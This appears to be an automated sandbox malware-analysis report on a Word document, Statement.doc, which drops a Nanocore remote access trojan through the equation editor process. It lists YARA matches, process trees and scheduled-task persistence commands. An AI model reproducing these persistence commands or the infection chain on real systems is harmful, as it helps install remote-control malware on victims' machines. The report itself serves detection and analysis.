Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C129
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_00444458
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00454BE8
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00454BDA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B4BE8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B4BDA
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_002143A0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00213788
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00214C78
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00214458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F43A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F3788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F4458

Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp	Binary or memory string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp	Binary or memory string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@32/13@16/2

Source: C:\Users\user\AppData\Roaming\JNM.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$atement.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JNM.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{9a83c6a0-5b64-416c-b0dc-d47048e32edf}

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD27B.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ......................$...........W.a.i.t.i.n.g. .f.o.r. .1.....H........e......................0...............(.........................$.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.......J.................$.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....d.......,.......H........e......................e. .............(..........................s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....d.......,.......H.......#e......................e. .............(..........................s....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.%...............%.....(.P.....$........................j......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................@.'...............'.....(.P.............\|................l......................................................................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................X.............W.a.i.t.i.n.g. .f.o.r. .1..............p......................0.................%.............................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............%.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P..............................q......................e. ...............%.......................7s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................&q......................e. ...............%.......................7s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................@.............W.a.i.t.i.n.g. .f.o.r. .1..............r......................0.................#.............................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............#.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............l...............!s......................e. ...............#.......................1s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............l.......@.......Gs......................e. ...............#.......................1s....

Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Statement.doc	Virustotal: Detection: 45%
Source: Statement.doc	ReversingLabs: Detection: 58%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\JNM.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
